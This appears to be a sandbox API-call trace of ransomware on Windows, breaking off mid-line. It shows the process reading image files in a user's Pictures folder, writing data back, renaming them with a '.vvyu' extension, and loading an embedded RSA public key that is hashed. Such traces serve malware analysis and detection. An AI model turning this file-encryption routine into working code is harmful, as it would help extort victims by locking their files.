0x29b9f30 [0190.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.853] GetCurrentThreadId () returned 0x5d8 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5388 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.854] GetCurrentThreadId () returned 0x5d8 [0190.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f78 [0190.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f90 [0190.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fa8 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f60 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f18 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0190.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f30 | out: hHeap=0x2c0000) returned 1 [0190.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af34b0 | out: hHeap=0x2c0000) returned 1 [0190.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.864] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x5cfb, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x5cfb, lpOverlapped=0x0) returned 1 [0190.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.865] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.865] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.867] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.867] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.867] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.867] CloseHandle (hObject=0x584) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.869] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ldaf6aCTl2hfcZ.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ldaf6actl2hfcz.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ldaf6aCTl2hfcZ.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ldaf6actl2hfcz.gif.vvyu")) returned 1 [0190.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.871] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.874] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa56e58c0, ftCreationTime.dwHighDateTime=0x1d89b9e, ftLastAccessTime.dwLowDateTime=0x2486f080, ftLastAccessTime.dwHighDateTime=0x1d8a64f, ftLastWriteTime.dwLowDateTime=0x2486f080, ftLastWriteTime.dwHighDateTime=0x1d8a64f, nFileSizeHigh=0x0, nFileSizeLow=0x4ae4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LIaR.gif", cAlternateFileName="")) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af34b0 [0190.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af34b0 | out: hHeap=0x2c0000) returned 1 [0190.875] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\LIaR.gif") returned=".gif" [0190.875] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\LIaR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\liar.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.875] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=19172) returned 1 [0190.875] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.882] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4abe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.882] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.884] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.885] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x4ae4, lpOverlapped=0x0) returned 1 [0190.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.885] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.886] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.886] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.886] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.887] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.887] GetLastError () returned 0x0 [0190.887] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.887] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.887] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.887] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.887] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4ae0) returned 0x2ae6ea0 [0190.888] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af34b0 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f30 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 